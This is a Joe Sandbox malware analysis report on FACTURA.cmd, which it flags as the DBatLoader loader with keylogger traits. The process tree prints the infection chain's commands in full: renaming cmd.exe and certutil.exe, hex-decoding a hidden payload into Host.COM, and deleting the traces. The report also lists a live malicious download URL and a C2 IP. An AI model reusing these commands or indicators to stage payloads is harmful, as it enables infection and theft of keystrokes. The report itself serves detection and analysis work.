Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FACTURA.cmd

Overview

General Information

Sample name:FACTURA.cmd
Analysis ID:1532879
MD5:41aff4b752555a0e4304ba0e04bb24c8
SHA1:a0cf311711779834c880e99799a8501165036a6c
SHA256:3b9f52447520a884c7ced8dbfb5d3cef7896a90910ef0b34b13cfecb9bd422cc
Infos:

Detection

DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
AI detected suspicious sample
Allocates many large memory junks
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Machine Learning detection for dropped file
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FACTURA.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7480 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7508 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7524 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7548 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7564 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7620 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7636 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • Host.COM (PID: 7652 cmdline: C:\Users\Public\Libraries\Host.COM MD5: 320D5ED383D73182150A145823610493)
    • alpha.exe (PID: 7660 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7688 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: Host.COM PID: 7652JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    9.2.Host.COM.2df0000.2.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Execution from Suspicious Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FACTURA.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7428, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7508, ProcessName: alpha.exe
      Sigma detected: Parent in Public Folder Suspicious Process
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7508, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7524, ProcessName: extrac32.exe
      Sigma detected: Suspicious Program Location with Network Connections
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 108.170.55.202, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\Host.COM, Initiated: true, ProcessId: 7652, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Found malware configuration
      Source: 9.0.Host.COM.400000.0.unpackMalware Configuration Extractor: DBatLoader {"Download Url": ["https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx"]}
      Multi AV Scanner detection for domain / URL
      Source: taksonsdfg.co.inVirustotal: Detection: 10%Perma Link
      Source: https://taksonsdfg.co.in/./Virustotal: Detection: 5%Perma Link
      Source: https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxVirustotal: Detection: 11%Perma Link
      Source: https://taksonsdfg.co.in/xVirustotal: Detection: 10%Perma Link
      Source: https://taksonsdfg.co.in/Virustotal: Detection: 5%Perma Link
      Multi AV Scanner detection for dropped file
      Source: C:\Users\Public\Libraries\Host.COMVirustotal: Detection: 51%Perma Link
      Multi AV Scanner detection for submitted file
      Source: FACTURA.cmdReversingLabs: Detection: 33%
      Source: FACTURA.cmdVirustotal: Detection: 34%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.9% probability
      Machine Learning detection for dropped file
      Source: C:\Users\Public\Libraries\Host.COMJoe Sandbox ML: detected
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A2C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,6_2_00007FF7E07A2C2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A2F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF7E07A2F38
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D21A4 #360,#359,#357,#357,BCryptFreeBuffer,6_2_00007FF7E07D21A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08561AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,6_2_00007FF7E08561AC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,6_2_00007FF7E081A1E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0896214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,6_2_00007FF7E0896214
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF7E082E1F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,6_2_00007FF7E086A1F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E089613C CryptDecodeObjectEx,6_2_00007FF7E089613C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF7E07F417C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0816194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF7E0816194
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0868298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,6_2_00007FF7E0868298
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E089A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,6_2_00007FF7E089A2E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D0300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,6_2_00007FF7E07D0300
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF7E085E274
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0806280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E0806280
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0852278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,6_2_00007FF7E0852278
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BE3B0 #357,#357,CryptDecodeObject,LocalFree,6_2_00007FF7E07BE3B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D23E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,6_2_00007FF7E07D23E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B4410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07B4410
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0868404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF7E0868404
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0826374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,6_2_00007FF7E0826374
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0822358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,6_2_00007FF7E0822358
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08024D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,6_2_00007FF7E08024D4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A44E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07A44E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF7E085E516
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BC514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,6_2_00007FF7E07BC514
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,6_2_00007FF7E080A450
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,6_2_00007FF7E080C450
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0828488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,6_2_00007FF7E0828488
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08365B4 NCryptIsKeyHandle,_CxxThrowException,6_2_00007FF7E08365B4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BC5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,6_2_00007FF7E07BC5D4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,6_2_00007FF7E07F25E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B8600 #357,CryptDecodeObject,GetLastError,LocalFree,6_2_00007FF7E07B8600
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E089A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,6_2_00007FF7E089A58C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF7E086A590
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082E57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,6_2_00007FF7E082E57C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D26E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,6_2_00007FF7E07D26E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08666D8 NCryptFreeObject,#360,6_2_00007FF7E08666D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08586D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,6_2_00007FF7E08586D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C0630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07C0630
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866654 NCryptGetProperty,#360,6_2_00007FF7E0866654
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FA654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,6_2_00007FF7E07FA654
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0804694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,6_2_00007FF7E0804694
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C6694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,6_2_00007FF7E07C6694
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08307A4 BCryptDestroyHash,#205,#357,6_2_00007FF7E08307A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08407D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF7E08407D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08227BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E08227BC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07967CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07967CC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF7E081C7F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08307F4 BCryptDestroyKey,#205,#357,6_2_00007FF7E08307F4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0868814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,6_2_00007FF7E0868814
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0822724 CryptDecodeObject,GetLastError,#357,6_2_00007FF7E0822724
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830740 BCryptCloseAlgorithmProvider,#205,#357,#357,6_2_00007FF7E0830740
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF7E086A740
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E089E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,6_2_00007FF7E089E8B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07AA8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,6_2_00007FF7E07AA8CC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08308EC BCryptGetProperty,#205,#359,#357,#357,6_2_00007FF7E08308EC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0864914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF7E0864914
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,6_2_00007FF7E081E914
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B6824 CryptHashCertificate,GetLastError,#357,6_2_00007FF7E07B6824
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830844 BCryptExportKey,#205,#359,#357,#357,6_2_00007FF7E0830844
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF7E07F29A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083099C BCryptOpenAlgorithmProvider,#205,#359,#359,6_2_00007FF7E083099C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF7E086A9F0
